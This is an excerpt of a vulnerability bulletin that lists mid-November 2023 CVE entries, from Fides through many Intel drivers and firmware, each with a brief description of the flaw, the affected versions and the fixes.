Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides Privacy Center allows data subject users to submit privacy and consent requests to data controller users of the Fides web application. Privacy requests allow data subjects to submit a request to access all person data held by the data controller or delete/erase it. Consent request allows data subject users to modify their privacy preferences for how the data controller uses their personal data e.g. data sales and sharing consent opt-in/opt-out. If `subject_identity_verification_required` in the `[execution]` section of `fides.toml` or the env var `FIDES__EXECUTION__SUBJECT_IDENTITY_VERIFICATION_REQUIRED` is set to `True` on the fides webserver backend, data subjects are sent a one-time code to their email address or phone number, depending on messaging configuration, and the one-time code must be entered in the Privacy Center UI by the data subject before the privacy or consent request is submitted. It was identified that the one-time code values for these requests were generated by the python `random` module, a cryptographically weak pseduo-random number generator (PNRG). If an attacker generates several hundred consecutive one-time codes, this vulnerability allows the attacker to predict all future one-time code values during the lifetime of the backend python process. There is no security impact on data access requests as the personal data download package is not shared in the Privacy Center itself. However, this vulnerability allows an attacker to (i) submit a verified data erasure request, resulting in deletion of data for the targeted user and (ii) submit a verified consent request, modifying a user’s privacy preferences. The vulnerability has been patched in Fides version `2.24.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no known workarounds for this vulnerability. 2023-11-15 not yet calculated CVE-2023-48224

 

ets_soft — ybc_blog ETS Soft ybc_blog before v4.4.0 was discovered to contain a SQL injection vulnerability via the component Ybc_blogBlogModuleFrontController::getPosts(). 2023-11-15 not yet calculated CVE-2023-43979
eyoucms — eyoucms EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t. 2023-11-15 not yet calculated CVE-2023-41597
ffmpeg — ffmpeg
 
Buffer Overflow vulnerability in Ffmpeg before github commit 4565747056a11356210ed8edcecb920105e40b60 allows a remote attacker to achieve an out-of-array write, execute arbitrary code, and cause a denial of service (DoS) via the ref_pic_list_struct function in libavcodec/evc_ps.c 2023-11-16 not yet calculated CVE-2023-47470

 

fileutil.extract() — fileutil.extract FileUtil.extract() enumerates all zip file entries and extracts each file without validating whether file paths in the archive are outside the intended directory. When creating an instance of TensorflowModel using the saved_model format and an exported tensorflow model, the apply() function invokes the vulnerable implementation of FileUtil.extract(). Arbitrary file creation can directly lead to code execution 2023-11-15 not yet calculated CVE-2023-5245
 
first_co.,_ltd. — multiple_products
 
Missing authentication for critical function vulnerability in First Corporation’s DVRs allows a remote unauthenticated attacker to rewrite or obtain the configuration information of the affected device. Note that updates are provided only for Late model of CFR-4EABC, CFR-4EAB, CFR-8EAB, CFR-16EAB, MD-404AB, and MD-808AB. As for the other products, apply the workaround. 2023-11-16 not yet calculated CVE-2023-47674

 

first_corporation — dvr First Corporation’s DVRs use a hard-coded password, which may allow a remote unauthenticated attacker to rewrite or obtain the configuration information of the affected device. Note that updates are provided only for Late model of CFR-4EABC, CFR-4EAB, CFR-8EAB, CFR-16EAB, MD-404AB, and MD-808AB. As for the other products, apply the workaround. 2023-11-16 not yet calculated CVE-2023-47213

 

fortinet — fortiadc/fortiddos-f
 
A permissive cross-domain policy with untrusted domains vulnerability in Fortinet FortiADC 7.1.0 – 7.1.1, FortiDDoS-F 6.3.0 – 6.3.4 and 6.4.0 – 6.4.1 allow an unauthorized attacker to carry out privileged actions and retrieve sensitive information via crafted web requests. 2023-11-14 not yet calculated CVE-2023-25603
fortinet — fortiadc/fortiddos-f
 
Multiple buffer copy without checking size of input (‘classic buffer overflow’) vulnerabilities [CWE-120] in FortiADC version 7.2.0 and before 7.1.2 & FortiDDoS-F version 6.5.0 and before 6.4.1 allows a privileged attacker to execute arbitrary code or commands via specifically crafted CLI requests. 2023-11-14 not yet calculated CVE-2023-29177
fortinet — forticlient A use of hard-coded credentials vulnerability in Fortinet FortiClient Windows 7.0.0 – 7.0.9 and 7.2.0 – 7.2.1 allows an attacker to bypass system protections via the use of static credentials. 2023-11-14 not yet calculated CVE-2023-33304
fortinet — forticlient_for_windows
 
A incorrect authorization in Fortinet FortiClient (Windows) 7.0.0 – 7.0.7, 6.4.0 – 6.4.9, 6.2.0 – 6.2.9 and 6.0.0 – 6.0.10 allows an attacker to cause denial of service via sending a crafted request to a specific named pipe. 2023-11-14 not yet calculated CVE-2022-40681
fortinet — forticlientwindows A untrusted search path vulnerability in Fortinet FortiClientWindows 7.0.9 allows an attacker to perform a DLL Hijack attack via a malicious OpenSSL engine library in the search path. 2023-11-14 not yet calculated CVE-2023-41840
fortinet — fortiedrcollectorwindows An improper access control vulnerability [CWE-284] in FortiEDRCollectorWindows version 5.2.0.4549 and below, 5.0.3.1007 and below, 4.0 all may allow a local attacker to prevent the collector service to start in the next system reboot by tampering with some registry keys of the service. 2023-11-14 not yet calculated CVE-2023-44248
fortinet — fortimail An improper authorization vulnerability [CWE-285] in FortiMail webmail version 7.2.0 through 7.2.2 and before 7.0.5 allows an authenticated attacker to see and modify the title of address book folders of other users via crafted HTTP or HTTPs requests. 2023-11-14 not yet calculated CVE-2023-36633
fortinet — fortios/fortiproxy
 
An improper validation of integrity check value vulnerability [CWE-354] in FortiOS 7.2.0 through 7.2.3, 7.0.0 through 7.0.12, 6.4 all versions, 6.2 all versions, 6.0 all versions and FortiProxy 7.2 all versions, 7.0 all versions, 2.0 all versions VMs may allow a local attacker with admin privileges to boot a malicious image on the device and bypass the filesystem integrity check in place. 2023-11-14 not yet calculated CVE-2023-28002
fortinet — fortisiem A improper neutralization of special elements used in an os command (‘os command injection’) in Fortinet FortiSIEM version 5.4.0 and 5.3.0 through 5.3.3 and 5.2.5 through 5.2.8 and 5.2.1 through 5.2.2 and 5.1.0 through 5.1.3 and 5.0.0 through 5.0.1 and 4.10.0 and 4.9.0 and 4.7.2 allows attacker to execute unauthorized code or commands via crafted API requests. 2023-11-14 not yet calculated CVE-2023-36553
fortinet — fortisiem An exposure of sensitive information to an unauthorized actor [CWE-200] in FortiSIEM version 7.0.0 and before 6.7.5 may allow an attacker with access to windows agent logs to obtain the windows agent password via searching through the logs. 2023-11-14 not yet calculated CVE-2023-41676
fortinet — fortiwlm A improper neutralization of special elements used in an sql command (‘sql injection’) in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.0 through 8.4.2 and 8.3.0 through 8.3.2 and 8.2.2 allows attacker to execute unauthorized code or commands via a crafted http request. 2023-11-14 not yet calculated CVE-2023-34991
fortinet — multiple_products A numeric truncation error in Fortinet FortiProxy version 7.2.0 through 7.2.4, FortiProxy version 7.0.0 through 7.0.10, FortiProxy 2.0 all versions, FortiProxy 1.2 all versions, FortiProxy 1.1, all versions, FortiProxy 1.0 all versions, FortiOS version 7.4.0, FortiOS version 7.2.0 through 7.2.5, FortiOS version 7.0.0 through 7.0.12, FortiOS 6.4 all versions, FortiOS 6.2 all versions, FortiOS 6.0 all versions allow attacker to denial of service via specifically crafted HTTP requests. 2023-11-14 not yet calculated CVE-2023-36641
fortinet — multiple_products A use of hard-coded credentials vulnerability in Fortinet FortiAnalyzer and FortiManager 7.0.0 – 7.0.8, 7.2.0 – 7.2.3 and 7.4.0 allows an attacker to access Fortinet private testing data via the use of static credentials. 2023-11-14 not yet calculated CVE-2023-40719
fortinet — fortiadc
 
An improper access control vulnerability [CWE-284] in FortiADC automation feature 7.1.0 through 7.1.2, 7.0 all versions, 6.2 all versions, 6.1 all versions may allow an authenticated low-privileged attacker to escalate their privileges to super_admin via a specific crafted configuration of fabric automation CLI script. 2023-11-14 not yet calculated CVE-2023-26205
free5gc — free5gc An issue in Free5gc v.3.3.0 allows a local attacker to cause a denial of service via the free5gc-compose component. 2023-11-16 not yet calculated CVE-2023-47025
free5gc — free5gc
 
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero. 2023-11-15 not yet calculated CVE-2023-47345
free5gc — free5gc
 
Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages. 2023-11-13 not yet calculated CVE-2023-47346
free5gc — free5gc
 
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes. 2023-11-15 not yet calculated CVE-2023-47347
free_software_foundation — grub-legacy
 
An attacker with local access to a system (either through a disk or external drive) can present a modified XFS partition to grub-legacy in such a way to exploit a memory corruption in grub’s XFS file system implementation. 2023-11-10 not yet calculated CVE-2023-4949
fuji_electric_co.,_ltd._and_hakko_electronics_co.,_ltd. — tellus/tellus_lite
 
Multiple improper restriction of operations within the bounds of a memory buffer issues exist in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier. If a user opens a specially crafted file (X1, V8, or V9 file), information may be disclosed and/or arbitrary code may be executed. 2023-11-15 not yet calculated CVE-2023-47580

 

fuji_electric_co.,_ltd._and_hakko_electronics_co.,_ltd. — tellus/tellus_lite
 
Out-of-bounds read vulnerability exists in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier. If a user opens a specially crafted file (X1, V8, or V9 file), information may be disclosed and/or arbitrary code may be executed. 2023-11-15 not yet calculated CVE-2023-47581

 

fuji_electric_co.,_ltd._and_hakko_electronics_co.,_ltd. — tellus/tellus_lite
 
Access of uninitialized pointer vulnerability exists in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier. If a user opens a specially crafted file (X1, V8, or V9 file), information may be disclosed and/or arbitrary code may be executed. 2023-11-15 not yet calculated CVE-2023-47582

 

fuji_electric_co.,_ltd._and_hakko_electronics_co.,_ltd. — tellus_simulator
 
Multiple out-of-bounds read vulnerabilities exist in TELLUS Simulator V4.0.17.0 and earlier. If a user opens a specially crafted file (X1 or V9 file), information may be disclosed and/or arbitrary code may be executed. 2023-11-15 not yet calculated CVE-2023-47583

 

fuji_electric_co.,_ltd._and_hakko_electronics_co.,_ltd. — v-server
 
Out-of-bounds write vulnerability exists in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier. If a user opens a specially crafted VPR file, information may be disclosed and/or arbitrary code may be executed. 2023-11-15 not yet calculated CVE-2023-47584

 

fuji_electric_co.,_ltd._and_hakko_electronics_co.,_ltd. — v-server
 
Out-of-bounds read vulnerability exists in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier. If a user opens a specially crafted VPR file, information may be disclosed and/or arbitrary code may be executed. 2023-11-15 not yet calculated CVE-2023-47585

 

fuji_electric_co.,_ltd._and_hakko_electronics_co.,_ltd. — v-server
 
Multiple heap-based buffer overflow vulnerabilities exist in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier. If a user opens a specially crafted VPR file, information may be disclosed and/or arbitrary code may be executed. 2023-11-15 not yet calculated CVE-2023-47586

 

getsimplecms — getsimplecms
 
A vulnerability was found in GetSimpleCMS 3.3.16/3.4.0a. It has been rated as critical. This issue affects some unknown processing of the file /admin/theme-edit.php. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-245735. 2023-11-17 not yet calculated CVE-2023-6188

 

git-urls — git-urls git-urls version 1.0.1 is vulnerable to ReDOS (Regular Expression Denial of Service) in Go package. 2023-11-18 not yet calculated CVE-2023-46402
google — chrome
 
Use after free in Garbage Collection in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-11-15 not yet calculated CVE-2023-5997

 

google — chrome
 
Use after free in Navigation in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-11-15 not yet calculated CVE-2023-6112

 

gpac — gpac
 
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a heap-use-after-free via the flush_ref_samples function at /gpac/src/isomedia/movie_fragments.c. 2023-11-15 not yet calculated CVE-2023-48011
 
gpac — gpac
 
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a double free via the gf_filterpacket_del function at /gpac/src/filter_core/filter.c. 2023-11-15 not yet calculated CVE-2023-48013
 
gpac — gpac
 
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a stack overflow via the hevc_parse_vps_extension function at /media_tools/av_parsers.c. 2023-11-15 not yet calculated CVE-2023-48014
 
grocy — grocy
 
Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the QR code function in the manageapikeys component. 2023-11-15 not yet calculated CVE-2023-48197
 
grocy — grocy
 
Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the product description component in the api/stock/products endpoint. 2023-11-15 not yet calculated CVE-2023-48198
 
grocy — grocy
 
An issue in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the QR code funciton in the manageapikeys component. 2023-11-15 not yet calculated CVE-2023-48199

 

grocy — grocy
 
Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component. 2023-11-15 not yet calculated CVE-2023-48200
 
h2oai — h2oai/h2o-3
 
H2O is vulnerable to stored XSS vulnerability which can lead to a Local File Include attack. 2023-11-16 not yet calculated CVE-2023-6013
h2oai — h2oai/h2o-3
 
An attacker is able to gain remote code execution on a server hosting the H2O dashboard through it’s POJO model import feature. 2023-11-16 not yet calculated CVE-2023-6016
h2oai — h2oai/h2o-3
 
H2O included a reference to an S3 bucket that no longer existed allowing an attacker to take over the S3 bucket URL. 2023-11-16 not yet calculated CVE-2023-6017
h2oai — h2oai/h2o-3
 
An attacker is able to read any file on the server hosting the H2O dashboard without any authentication. 2023-11-16 not yet calculated CVE-2023-6038
honeywell — prowatch
 
Honeywell ProWatch, 4.5, including all Service Pack versions, contain a Vulnerability in Application Server’s executable folder(s). A(n) attacker could potentially exploit this vulnerability, leading to a standard user to have arbitrary system code execution. Honeywell recommends updating to the most recent version of this product, service or offering (Pro-watch 6.0.2, 6.0, 5.5.2,5.0.5). 2023-11-17 not yet calculated CVE-2023-6179
 
hpe — arubaos An authenticated vulnerability has been identified allowing an attacker to effectively establish highly privileged persistent arbitrary code execution across boot cycles. 2023-11-14 not yet calculated CVE-2023-45626
httpie — httpie
 
Missing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack. 2023-11-16 not yet calculated CVE-2023-48052
hyperledger_fabric — hyperledger_fabric Hyperledger Fabric is an open source permissioned distributed ledger framework. Combining two molecules to one another, called “cross-linking” results in a molecule with a chemical formula that is composed of all atoms of the original two molecules. In Fabric, one can take a block of transactions and cross-link the transactions in a way that alters the way the peers parse the transactions. If a first peer receives a block B and a second peer receives a block identical to B but with the transactions being cross-linked, the second peer will parse transactions in a different way and thus its world state will deviate from the first peer. Orderers or peers cannot detect that a block has its transactions cross-linked, because there is a vulnerability in the way Fabric hashes the transactions of blocks. It simply and naively concatenates them, which is insecure and lets an adversary craft a “cross-linked block” (block with cross-linked transactions) which alters the way peers process transactions. For example, it is possible to select a transaction and manipulate a peer to completely avoid processing it, without changing the computed hash of the block. Additional validations have been added in v2.2.14 and v2.5.5 to detect potential cross-linking issues before processing blocks. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-46132
ibm — cics_tx
 
IBM CICS TX Advanced 10.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 260770. 2023-11-18 not yet calculated CVE-2023-38361
 
ibm — infosphere_information_server
 
IBM InfoSphere Information Server 11.7 could allow an authenticated user to change installation files due to incorrect file permission settings. IBM X-Force ID: 263332. 2023-11-18 not yet calculated CVE-2023-40363
 
intel — arc_rgb_controller Incorrect default permissions in some Intel Arc RGB Controller software before version 1.06 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32638
intel — battery_life_diagnostic_tool Improper authorization in some Intel Battery Life Diagnostic Tool installation software before version 2.2.1 may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32662
intel — battery_life_diagnostic_tool Uncontrolled search path in some Intel Battery Life Diagnostic Tool software before version 2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-34430
intel — dcm Protection mechanism failure in some Intel DCM software before version 5.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access. 2023-11-14 not yet calculated CVE-2023-31273
intel — rapid_storage_technology Insecure inherited permissions in some Intel Rapid Storage Technology software before version 16.8.5.1014.9 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-39230
intel — server_configuration_utility Insecure inherited permissions in the installer for some Intel Server Configuration Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-34997
intel — smart_campus Improper access control in the Intel Smart Campus android application before version 9.4 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-38411
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmi Windows 5.27.03.0003 may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-36374
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmiEdit-Linux-5.27.06.0017 may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-36396
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Uncontrolled resource consumption in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-25949
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Use after free in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allowed an authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-26589
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated to potentially enable escalation of privileges via local access. 2023-11-14 not yet calculated CVE-2023-28397
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Exposure of sensitive information to an unauthorized actor in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-28723
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Improper initialization in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-28737
intel(r) — arc(tm)/iris(r)
 
NULL pointer dereference in some Intel(R) Arc(TM) & Iris(R) Xe Graphics – WHQL – Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2022-42879
intel(r) — arc(tm)/iris(r)
 
NULL pointer dereference in some Intel(R) Arc(TM) & Iris(R) Xe Graphics – WHQL – Windows Drviers before version 31.0.101.4255 may allow authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-25071
intel(r) — arc(tm)/iris(r)
 
Out-of-bounds write in some Intel(R) Arc(TM) & Iris(R) Xe Graphics – WHQL – Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-25952
intel(r) — arc(tm)/iris(r)
 
Incorrect default permissions in some Intel(R) Arc(TM) & Iris(R) Xe Graphics – WHQL – Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-27305
intel(r) — arc(tm)/iris(r)
 
Out-of-bounds write in some Intel(R) Arc(TM) & Iris(R) Xe Graphics – WHQL – Windows drivers before version 31.0.101.4255 may allow authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-28401
intel(r) — arc(tm)/iris(r)
 
Out-of-bounds read in the Intel(R) Arc(TM) & Iris(R) Xe Graphics – WHQL – Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-28404
intel(r) — arc(tm)/iris(r)
 
Unquoted search path or element in some Intel(R) Arc(TM) & Iris(R) Xe Graphics – WHQL – Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-29165
intel(r) — battery_life_diagnostic_tool_software
 
Improper access control in some Intel Battery Life Diagnostic Tool software before version 2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-38786
intel(r) — connectivity_performance_suite Improper access control in user mode driver for some Intel(R) Connectivity Performance Suite before version 2.1123.214.2 may allow unauthenticated user to potentially enable information disclosure via network access. 2023-11-14 not yet calculated CVE-2023-32279
intel(r) — e810
 
Out-of-bounds read in the firmware for some Intel(R) E810 Ethernet Controllers and Adapters before version 1.7.1 may allow an unauthenticated user to potentially enable denial of service via adjacent access. 2023-11-14 not yet calculated CVE-2023-28376
intel(r) — fpga
 
Out-of-bounds write in firmware for some Intel(R) FPGA products before version 2.8.1 may allow a privileged user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-22327
intel(r) — in-band_manageability_software
 
Improper access control in some Intel In-Band Manageability software before version 3.0.14 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-41689
intel(r) — multiple_products Path transversal in some Intel(R) NUC Kits & Mini PCs – NUC8i7HVK & NUC8HNK USB Type C power delivery controller installation software before version 1.0.10.3 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32655
intel(r) — multiple_products Unquoted search path in some Intel(R) NUC Kits NUC7i3DN, NUC7i5DN, NUC7i7DN HDMI firmware update tool software before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32658
intel(r) — nuc_bios Improper buffer restrictions in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-40220
intel(r) — nuc_bios Non-Transparent Sharing of Microarchitectural Resources in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-40540
intel(r) — nuc_kit
 
Improper authentication in some Intel(R) NUC Kit NUC11PH USB firmware installation software before version 1.1 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-28377
intel(r) — nuc_kit_nuc617kyk_thunderbolt(tm)_3 Uncontrolled search path in some Intel(R) NUC Kit NUC6i7KYK Thunderbolt(TM) 3 Firmware Update Tool installation software before version 46 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32660
intel(r) — nuc_kits
 
Path transversal in some Intel(R) NUC Kits NUC7i3DN, NUC7i5DN, NUC7i7DN HDMI firmware update tool software before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-27229
intel(r) — nuc_p14e_laptop_element_audio_install_package Path transversal in some Intel(R) NUC P14E Laptop Element Audio Install Package software before version 156 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-33878
intel(r) — nuc_pro_software_suite_installation_software
 
Insecure inherited permissions in some Intel(R) NUC Pro Software Suite installation software before version 2.0.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-41700
intel(r) — nuc_uniwill_service_driver Path transversal in some Intel(R) NUC Uniwill Service Driver for Intel(R) NUC M15 Laptop Kits – LAPRC510 & LAPRC710 Uniwill Service Driver installation software before version 1.0.1.7 for Intel(R) NUC Software Studio may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32278
intel(r) — nuc_watchdog_timer
 
Insecure inherited permissions in some Intel(R) NUC Watchdog Timer installation software before version 2.0.21.0 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-33898
intel(r) — ofu Improper access control in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32204
intel(r) — on_demand Insertion of sensitive information into log file in some Intel(R) On Demand software before versions 1.16.2, 2.1.1, 3.1.0 may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-32283
intel(r) — oneapi_hpc_toolkit/mpi_library_software
 
Protection mechanism failure in some Intel(R) oneAPI HPC Toolkit 2023.1 and Intel(R)MPI Library software before version 2021.9 may allow a privileged user to potentially enable escalation of privilege via adjacent access. 2023-11-14 not yet calculated CVE-2023-27383
intel(r) — oneapi_toolkits
 
Path traversal in some Intel(R) oneAPI Toolkits and Component software before version 2023.1 may allow authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-24592
intel(r) — optane(tm)
 
Insufficient control flow management in firmware for some Intel(R) Optane(TM) SSD products may allow a privileged user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-24587
intel(r) — optane(tm)
 
Exposure of sensitive information to an unauthorized actor in firmware for some Intel(R) Optane(TM) SSD products may allow an unauthenticated user to potentially enable information disclosure via physical access. 2023-11-14 not yet calculated CVE-2023-24588
intel(r) — optane(tm)
 
Improper Initialization in firmware for some Intel(R) Optane(TM) SSD products may allow an authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-27306
intel(r) — optane(tm)
 
Improper input validation in firmware for some Intel(R) Optane(TM) SSD products may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-27519
intel(r) — optane(tm)
 
Improper access control in firmware for some Intel(R) Optane(TM) SSD products may allow an unauthenticated user to potentially enable information disclosure via physical access. 2023-11-14 not yet calculated CVE-2023-27879
intel(r) — processors
 
Improper input validation in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via adjacent access. 2023-11-14 not yet calculated CVE-2023-22329
intel(r) — processors
 
Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access. 2023-11-14 not yet calculated CVE-2023-23583

 

intel(r) — processors
 
Out-of-bounds read in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via adjacent access. 2023-11-14 not yet calculated CVE-2023-25756
intel(r) — qat Improper input validation in firmware for Intel(R) QAT before version QAT20.L.1.0.40-00004 may allow escalation of privilege and denial of service via adjacent access. 2023-11-14 not yet calculated CVE-2023-32641
intel(r) — qat
 
Improper buffer restrictions in some Intel(R) QAT Library software before version 22.07.1 may allow a privileged user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-22313
intel(r) — qat
 
Improper authorization in some Intel(R) QAT drivers for Windows – HW Version 2.0 before version 2.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-28378
intel(r) — qat
 
Uncontrolled search path element in some Intel(R) QAT drivers for Windows – HW Version 2.0 before version 2.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-28740
intel(r) — qat
 
Buffer overflow in some Intel(R) QAT drivers for Windows – HW Version 1.0 before version 1.10 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-28741
intel(r) — realsense(tm)_dynamic_calibration_software
 
Uncontrolled search path element in some Intel(R) RealSense(TM) Dynamic Calibration software before version 2.13.1.0 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-29504
intel(r) — server_board/server_system_bios_firmware
 
Improper input validation in some Intel(R) Server board and Intel(R) Server System BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-33945
intel(r) — server_board_bios Improper input validation in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access 2023-11-14 not yet calculated CVE-2023-34431
intel(r) — server_board_bios_firmware
 
Improper buffer restrictions in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-29262
intel(r) — server_configuration_utility_software
 
Unquoted search path in the installer for some Intel Server Configuration Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-25075
intel(r) — server_information_retrieval_utility_software
 
Uncontrolled search path element in some Intel(R) Server Information Retrieval Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-27513
intel(r) — server_system_m70klp_family_bios_firmware
 
Improper input validation in some Intel(R) Server System M70KLP Family BIOS firmware before version 01.04.0029 may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-24379
intel(r) — simics_simulator Insecure inherited permissions in some Intel(R) Simics Simulator software before version 1.7.2 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-34314
intel(r) — unison_software
 
Improper access control for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2022-41659
